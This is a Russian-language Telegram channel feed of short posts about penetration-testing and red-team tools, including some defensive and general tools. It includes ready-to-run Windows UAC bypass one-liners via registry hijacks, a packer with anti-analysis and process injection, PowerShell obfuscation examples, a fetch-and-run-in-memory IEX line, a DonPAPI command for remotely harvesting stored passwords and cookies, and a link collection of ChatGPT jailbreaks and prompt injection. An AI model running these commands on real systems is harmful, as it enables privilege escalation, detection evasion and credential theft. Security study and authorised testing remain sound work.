Whitehat Lab
2.12K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
⚙️ Reserved for future use

⚠️ Disclaimer:

Вся публикуемая информация предоставляется исключительно в образовательных целях!
За противозаконные действия может грозить уголовная ответственность согласно законодательству вашей страны.


#nav

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Hetty 0.7.0

Это инструментарий по работе с HTTP, позиционирует себя как альтернатива 😈 Burp. Функционала конечно меньше, зато free и opensource. Написан на 💻 Go

💻 Home
💻 Download

#hetty #soft #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🌐 HackTools v0.5.0

Отличное универсальное расширение для веб пентеста

💻 Chromium based browsers:

➡️ Webstore

💻 Firefox:

➡️ Addons

Возможности:

▪️ Dynamic Reverse Shell generator
▪️ Shell Spawning
▪️ MSF Venom Builder
▪️ XSS Payloads
▪️ Basic SQLi payloads
▪️ Local file inclusion payloads (LFI)
▪️ Data Encoding
▪️ Obfuscated Files
▪️ Hash Generator
▪️ Useful Linux commands


💻 Home

#hacktools #browser #extension

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🎃 Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx

Relay через отравление LLMNR - research

😹 Krbrelayx
😹 Responder

#redteam #krbrelayx #llmnr #pentest #responder #relay

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔎 nuclei poc

Приветствую друзья!

В очередных поисках всякого интересного на просторах нашего необъятного интернета нашел отличный репозиторий от наших китайских товарищей с огромным количеством шаблонов для nuclei
Обновляется на ежедневной основе с помощью Github Actions и содержит более 110k! шаблонов. В файле repo.csv указаны источники для обновлений

Все шаблоны разбиты по категориям и вендорам

Установка:

git clone https://github.com/adysec/nuclei_poc
cd nuclei_poc


Примеры:

nuclei -t poc/ -u https://example.com

nuclei -t poc/web/ -u https://example.com

nuclei -t poc/wordpress/ -u https://example.com


😹 Home
😹 Eng. version

#nuclei #pentest #web #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔓 UAC bypass oneliners

eventvwr.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe


fodhelper.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe


sdclt.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe


slui.exe
reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe


perfmon.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe


taskmgr.exe
reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe


ComputerDefaults.exe
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe


sysprep.exe
reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe


control.exe
cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername


Сброс:
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f


#uac #bypass #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ ACEshark

Инструмент пост эксплуатации 💻Windows хостов для определения модифицируемых служб и ACL файлов

Установка:
git clone https://github.com/t3l3machus/ACEshark

cd ACEshark
pip3 install -r requirements.txt


Зависимости:
sudo apt-get install xclip
sudo apt-get install xselect


Запуск:
python3 ./ACEshark.py -s 10.10.1.10 -i

# Полученный скрипт выполняем на удаляемом хосте


🖥 Home

#soft #python #acrshark

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔐 Rusty-PE-Packer

Пакер исполняемых 🪟 Windows файлов написанный на 💻 Rust

Особенности:

Анти отладка
Анти анализ
Кастомное шифрование
Использование легитимного процесса (explorer по умолчанию)


Установка и запуск:

cd Launcher
cargo build --release
cd Packit
cargo build --release

Packit.exe <EXE_to_Pack> <Launcher.exe>


🖥 Home

#soft #rust #packer

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄😉 BloodHound CE v7.2.0

Обновление инструмента для выявления связей и построения графов в 💻 Active Directory. Достаточно учетной записи доменного пользователя.
Отличный инструмент при пентесте 🏠 AD среды.
Для сбора информации используются коллекторы bloodhound-ce или SharpHound

Установка:

curl -L https://ghst.ly/getbhce | docker compose -f - up

https://localhost:8080/ui/login


Логин admin и сгенерированный пароль

Для обновления переходим в директорию с docker-compose.yml и запускаем:

docker compose pull && docker compose up


Сбор информации:

python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp


Neo4j запросы:

# Domain Admins и время установки пароля
MATCH (g:Group) WHERE g.name =~ "(?i).*DOMAIN ADMINS.*" WITH g MATCH (g)<-
[r:MemberOf*1..]-(u) RETURN u.name AS User,
datetime({epochSeconds:toInteger(u.pwdlastset)}) as passwordLastSet, datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset


# Сервисные УЗ, время установки пароля, дата создания
MATCH (u:User) WHERE u.hasspn=true AND (NOT u.name STARTS WITH 'KRBTGT') RETURN u.name
AS accountName, datetime({epochSeconds: toInteger(u.pwdlastset)}) AS passwordLastSet,
datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset


# Пользователи и описание
MATCH (u:User) RETURN u.name as username, u.description as description


# Domain Admins или Administrators с сессией исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR
g.objectid ENDS WITH '-544'
MATCH p = (c:Computer)-[:HasSession]->(n) WHERE NOT c.name in domainControllers return
p


# Неограниченное делегирование исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name IN domainControllers
RETURN c


# Пользователи с ограниченным делегированием
MATCH p = ((u:User)-[r:AllowedToDelegate]->(c:Computer)) RETURN p


Подробный гайд
:

➡️ The Ultimate Guide BHCE
➡️ Адаптация на русском

ADCS атаки:

➡️ Part 1
➡️ Part 2
➡️ Part 3

Ссылки:

💻 Home
💻 Download
➡️ Docs

#bloodhound #pentest #active_directory #soft #bhce

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🔍 Zircolite v2.30.1

Отличный инструмент для исследования логов, особенно крайне кривых и неудобных 💻 Windows EVTX
Проводит анализ на основе SIGMA правил (основные идут в комплекте)
Также работает с файлами .log, .xml, .json

⚙️ Установка:

git clone https://github.com/wagga40/Zircolite

cd Zircolite

pip3 install -r requirements.full.txt


Для WIndows есть собранный бинарь

Примеры:

python3 zircolite.py --evtx system.evtx

python3 zircolite.py --evtx system.evtx --ruleset rules/rules_windows_sysmon_pysigma.json

python3 zircolite.py --events auditd.log --ruleset rules/rules_linux.json --auditd

python3 zircolite.py --events sysmon.log --ruleset rules/rules_linux.json --sysmon4linux


Обновление правил:

python3 zircolite.py -U


🗂 Тестовый EVTX

💻 Home
💻 Sigma
📔 Documentation

#dfir #forensics #zircolite #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 uutils coreutils 0.0.30

Это кроссплатформенная реализация GNU coreutils переписанная на Rust

Реализовано более 100 утилит. Проект стремится работать на как можно большем количестве платформ, чтобы иметь возможность использовать одни и те же утилиты на 🐧 Linux, 💻 Mac, 💻 Windows и других платформах. Это гарантирует, что скрипты могут быть легко перенесены между платформами

cargo install coreutils
~/.cargo/bin/coreutils


Установка via 💻 winget:

winget install uutils.coreutils


💻 Project
💬 Docs
🖥 Install

#coreutils #soft #rust

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 ksthunk.sys Integer Overflow (PE)

🚩 Windows 11 23H2 Tested

Уязвимость в ksthunk.sys CKSAutomationThunk::ThunkEnableEventIrp позволяет локальному пользователю воспользоваться уязвимостью переполнения буфера, которую можно использовать для получения повышенных привилегий в операционной системе 💻 Windows.


🔹 SSD Advisory – ksthunk.sys Integer Overflow

#lpe #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👩‍💻 OpenAI Cookbook

Руководства, библиотеки и примеры кодов для выполнения различных задач с API OpenAI

Полезное:

😉 How to work with large language models
😉 Introduction to GPT-4o and GPT-4o mini
😉 Using GPT4o mini to tag and caption images
😉 How to parse PDF docs for RAG
😉 Using reasoning for data validation
😉 How to call functions with chat models

Библиотеки:

😉 Chainlit - making chatbot interfaces 🐍
😉 Embedchain - managing and syncing unstructured data with LLMs 🐍
😉 LangChain - chaining sequences of language model prompts 🐍🖥
😉 Outlines - provides a domain-specific language to simplify prompting 🐍

Пример транскрибации
🎧 аудио файла:

import requests
import base64
import os
import json

# Load the API key from the environment variable
api_key = os.getenv("OPENAI_API_KEY")


def process_audio_with_gpt_4o(base64_encoded_audio, output_modalities, system_prompt):
# Chat Completions API end point
url = "https://api.openai.com/v1/chat/completions"

# Set the headers
headers = {
"Content-Type": "application/json",
"Authorization": f"Bearer {api_key}"
}

# Construct the request data
data = {
"model": "gpt-4o-audio-preview",
"modalities": output_modalities,
"audio": {
"voice": "alloy",
"format": "wav"
},
"messages": [
{
"role": "system",
"content": system_prompt
},
{
"role": "user",
"content": [
{
"type": "input_audio",
"input_audio": {
"data": base64_encoded_audio,
"format": "wav"
}
}
]
}
]
}

request_response = requests.post(url, headers=headers, data=json.dumps(data))
if request_response.status_code == 200:
return request_response.json()
else:
print(f"Error {request_response.status_code}: {request_response.text}")
return


audio_wav_path = "./sounds/keynote_recap.wav"

# Read the WAV file and encode it to base64
with open(audio_wav_path, "rb") as audio_file:
audio_bytes = audio_file.read()
english_audio_base64 = base64.b64encode(audio_bytes).decode('utf-8')

modalities = ["text"]
prompt = "The user will provide an audio file in English. Transcribe the audio to English text, word for word. Only provide the language transcription, do not include background noises such as applause. "

response_json = process_audio_with_gpt_4o(english_audio_base64, modalities, prompt)

english_transcript = response_json['choices'][0]['message']['content']

print(english_transcript)


😉 Home
💻 Cookbook

#openai #api #cheatsheet #llm

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 ADCS Attack Techniques Cheatsheet

Отличная шпаргалка по атакам на ADCS
Разобраны основные инструменты для проверки и эксплуатации уязвимостей

😹 Certipy
😹 Certify
😹 PSPKIAud
😹 LSmith
😹 BloodHound
😹 Certi
😹 Adalanche
😹 PingCastle
😹 impacket
😹 Metasploit

💻 Cheatsheet

#adcs #active_directory #windows #esc #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Awesome GPT Super Prompting

🟢 ChatGPT Jailbreaks
🟢 GPT Assistants Prompt Leaks
🟢 GPTs Prompt Injection
🟢 LLM Prompt Security
🟢 Prompt Hack
🟢 Prompt Security
🟢 Ai Prompt Engineering
🟢 Adversarial Machine Learning


🖥 Home

#llm #prompthack #gpt

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥 CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface

➡️ https://security.paloaltonetworks.com/CVE-2024-9474
➡️ CVE-2024-0012 & CVE-2024-9474 Research

Уязвимые версии:

🟢 PAN-OS < 11.2.4-h1
🟢 PAN-OS < 11.1.5-h1
🟢 PAN-OS < 11.0.6-h1
🟢 PAN-OS < 10.2.12-h2
🟢 PAN-OS < 10.1.14-h6


🖥 PAN-OS auth bypass + RCE - PoC

#panos #rce #poc #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🏃 PowerHuntShares v2.1

Инструмент для аудита сетевых ресурсов (SMB shares), написан на PowerShell

➡️ Подробнейший гайд (english)

Запуск:

Set-ExecutionPolicy -Scope Process Bypass
Import-Module .\PowerHuntShares.psm1

# Загрузка и запуск из памяти
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")


# Запуск с доменного хоста
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

# Запуск с НЕ доменного хоста
runas /netonly /user:domain\user PowerShell.exe
Import-Module .\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user


На выходе получаем красивый 🖥 HTML отчет

🖥 Home

#PowerHuntShares #powershell #soft #smb #windows #active_directory

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🏃 psobf v1.0 Powershell Obfuscator

Инструмент для обфускации PoSh скриптов, написан на 🖼️ Go

Установка:

go install github.com/TaurusOmar/psobf@latest


Запуск:

psobf -i .\revsh.ps1 -o revsh_obf.ps1 -level 1


На вход подаем оригинальный скрипт, на выход получаем обфусцированный и указываем уровень обфускации, всего их 5

Примеры:

# Original
Write-Host "Hello, World!"

# Obfuscated level 1
$obfuscated = $([char[]]("`W`,`r`,`i`,`t`,`e`,`-`,`H`,`o`,`s`,`t`,` `,`"`,`H`,`e`,`l`,`l`,`o`,`,` `,`W`,`o`,`r`,`l`,`d`,`!`,`"`") -join ''); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 2
$obfuscated = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI=')); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 3
$e = [System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='); $obfuscated = [System.Text.Encoding]::UTF8.GetString($e); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 4
$compressed = 'H4sIAAAAAAAAC+NIzcnJVyjPL8pJUQQAlRmFGwwAAAA='; $bytes = [System.Convert]::FromBase64String($compressed); $stream = New-Object IO.MemoryStream(, $bytes); $decompressed = New-Object IO.Compression.GzipStream($stream, [IO.Compression.CompressionMode]::Decompress); $reader = New-Object IO.StreamReader($decompressed); $obfuscated = $reader.ReadToEnd(); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 5
$fragments = @(
'Write-',
'Output "',
'Hello,',
' Wo',
'rld!',
'"'
);
$script = $fragments -join '';
Invoke-Expression $script


🖥 Home

#soft #powershell #obfuscator #psobf

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⌨️ DonPAPI v1.2.0

DPAPI (Data Protection API) - крипто интерфейс в 💻Windows, который обеспечивает программам шифрование их сохраненных данных (пароли, cookie, токены и т.д.)

Данный инструмент позволяет забрать необходимые данные удаленно, написан на 🐍

Собираемые данные:

Chromium браузеры
Windows сертификаты
Диспетчер УД (Credential Manager)
Firefox
Mobaxterm
MRemoteNg
RDC Manager
SCCM
Vaults
VNC


Установка/Запуск:

pipx install donpapi

pipx run donpapi collect -u admin -p 'Password' -d domain.local -t ALL


GUI для просмотра собранных данных:

pipx run donpapi gui

https://127.0.0.1:8088


Поддерживает аутентификацию Kerberos, Pass The Hash
-k
--hashes
--aesKey

🖥 Home
➡️ Секреты DPAPI

#python #donpapi #soft #dpapi

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Living Off The Land Active Directory

Exploiting Native AD Techniques for Security


😉 LOLAD

Проект
предоставляет обширную коллекцию методов, команд и функций 💻 Active Directory, которые можно использовать для операций по обеспечению безопасности и тренировки Redteam
Базу надо знать! 👍

Некоторые примеры:

# Collect Domain SID
Get-ADDomain | Select-Object SID

# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate

# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName

# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName

# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName


💻 Home

#lolad #redteam #active_directory #powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM